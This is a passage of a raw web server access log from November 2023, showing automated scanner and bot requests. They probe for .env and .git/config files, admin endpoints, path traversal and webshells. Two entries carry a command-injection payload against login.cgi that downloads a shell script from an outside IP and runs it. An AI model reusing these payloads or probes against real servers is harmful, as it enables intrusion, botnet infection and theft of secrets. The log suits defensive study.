AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 67.217.57.54 - - [18/Nov/2023:14:21:01 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 46.35.252.130 - - [18/Nov/2023:14:57:28 +0100] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 46.246.122.68 - - [18/Nov/2023:15:15:03 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:75.0) Gecko/20100101 Firefox/75.0" 193.35.18.187 - - [18/Nov/2023:15:27:01 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 67.217.57.54 - - [18/Nov/2023:16:01:35 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 68.69.185.50 - - [18/Nov/2023:16:02:27 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 68.69.185.50 - - [18/Nov/2023:16:02:30 +0100] "GET ../../proc/ HTTP" 400 383 "-" "-" 183.136.225.5 - - [18/Nov/2023:16:17:10 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" 107.170.229.26 - - [18/Nov/2023:16:32:13 +0100] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x" 67.217.57.54 - - [18/Nov/2023:16:34:32 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 196.65.184.129 - - [18/Nov/2023:16:41:46 +0100] "GET /.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 196.65.184.129 - - [18/Nov/2023:16:41:46 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 185.233.19.148 - - [18/Nov/2023:16:51:47 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 83.97.73.87 - - [18/Nov/2023:17:15:42 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 196.65.184.129 - - [18/Nov/2023:17:33:56 +0100] "GET /.env HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 196.65.184.129 - - [18/Nov/2023:17:33:56 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 207.191.165.229 - - [18/Nov/2023:17:34:12 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 185.216.70.5 - - [18/Nov/2023:17:40:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15" 67.217.57.54 - - [18/Nov/2023:17:49:20 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 198.235.24.154 - - [18/Nov/2023:17:52:51 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 164.92.91.216 - - [18/Nov/2023:17:56:42 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 192.241.231.44 - - [18/Nov/2023:17:57:28 +0100] "GET /druid/index.html HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x" 198.235.24.144 - - [18/Nov/2023:18:11:19 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 83.97.73.87 - - [18/Nov/2023:18:22:47 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.35.18.187 - - [18/Nov/2023:18:32:05 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 198.235.24.171 - - [18/Nov/2023:18:53:47 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 34.140.248.32 - - [18/Nov/2023:19:04:49 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0" 35.178.58.249 - - [18/Nov/2023:19:04:54 +0100] "" 400 383 "-" "-" 35.178.58.249 - - [18/Nov/2023:19:06:45 +0100] "" 400 383 "-" "-" 198.235.24.28 - - [18/Nov/2023:19:23:52 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 67.217.57.54 - - [18/Nov/2023:19:24:07 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 198.199.108.13 - - [18/Nov/2023:19:37:10 +0100] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 68.183.37.169 - - [18/Nov/2023:19:39:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.69.185.50 - - [18/Nov/2023:20:05:49 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 68.69.185.50 - - [18/Nov/2023:20:05:53 +0100] "GET ../../proc/ HTTP" 400 383 "-" "-" 134.122.32.196 - - [18/Nov/2023:20:06:23 +0100] "\x16\x03\x01" 400 383 "-" "-" 134.122.32.196 - - [18/Nov/2023:20:06:23 +0100] "\x16\x03\x01" 400 383 "-" "-" 134.122.32.196 - - [18/Nov/2023:20:06:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 134.122.32.196 - - [18/Nov/2023:20:06:23 +0100] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2" 134.122.32.196 - - [18/Nov/2023:20:06:23 +0100] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0" 134.122.32.196 - - [18/Nov/2023:20:06:24 +0100] "\x16\x03\x01" 400 383 "-" "-" 134.122.32.196 - - [18/Nov/2023:20:06:24 +0100] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 134.122.32.196 - - [18/Nov/2023:20:06:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)" 134.122.32.196 - - [18/Nov/2023:20:06:24 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 134.122.32.196 - - [18/Nov/2023:20:06:25 +0100] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 134.122.32.196 - - [18/Nov/2023:20:06:25 +0100] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 134.122.32.196 - - [18/Nov/2023:20:06:25 +0100] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 134.122.32.196 - - [18/Nov/2023:20:06:25 +0100] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 134.122.32.196 - - [18/Nov/2023:20:06:25 +0100] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 134.122.32.196 - - [18/Nov/2023:20:06:26 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 67.217.57.54 - - [18/Nov/2023:20:13:51 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 46.35.252.130 - - [18/Nov/2023:20:20:31 +0100] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36" 67.217.57.54 - - [18/Nov/2023:20:20:48 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0" 67.217.57.54 - - [18/Nov/2023:20:23:23 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0" 185.254.97.77 - - [18/Nov/2023:20:27:44 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://91.92.240.111/GuruITDDoS3.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 205.210.31.26 - - [18/Nov/2023:20:28:05 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 185.254.97.77 - - [18/Nov/2023:20:40:07 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://91.92.240.111/GuruITDDoS3.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 179.219.106.233 - - [18/Nov/2023:20:40:34 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 179.219.106.233 - - [18/Nov/2023:20:40:35 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.31.73.225 - - [18/Nov/2023:21:21:05 +0100] "GET / HTTP/1.0" 200 423 "-" "-" 196.65.184.129 - - [18/Nov/2023:21:33:04 +0100] "GET /.env HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 196.65.184.129 - - [18/Nov/2023:21:33:05 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 67.217.57.54 - - [18/Nov/2023:21:39:16 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 35.214.172.43 - - [18/Nov/2023:21:41:36 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; a7d576d2ab) Chrome/84.0.4147.105 Safari/537.36" 35.214.172.43 - - [18/Nov/2023:21:41:36 +0100] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; a7d576d2ab) Chrome/84.0.4147.105 Safari/537.36" 67.217.57.54 - - [18/Nov/2023:22:09:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 67.217.57.54 - - [18/Nov/2023:22:59:56 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 67.217.57.54 - - [18/Nov/2023:23:49:49 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 92.222.24.154 - - [18/Nov/2023:23:53:57 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 47.128.17.183 - - [19/Nov/2023:00:08:24 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 67.217.57.54 - - [19/Nov/2023:00:31:39 +0100] "GET / HTTP/1.1" 200 423 "-" "-"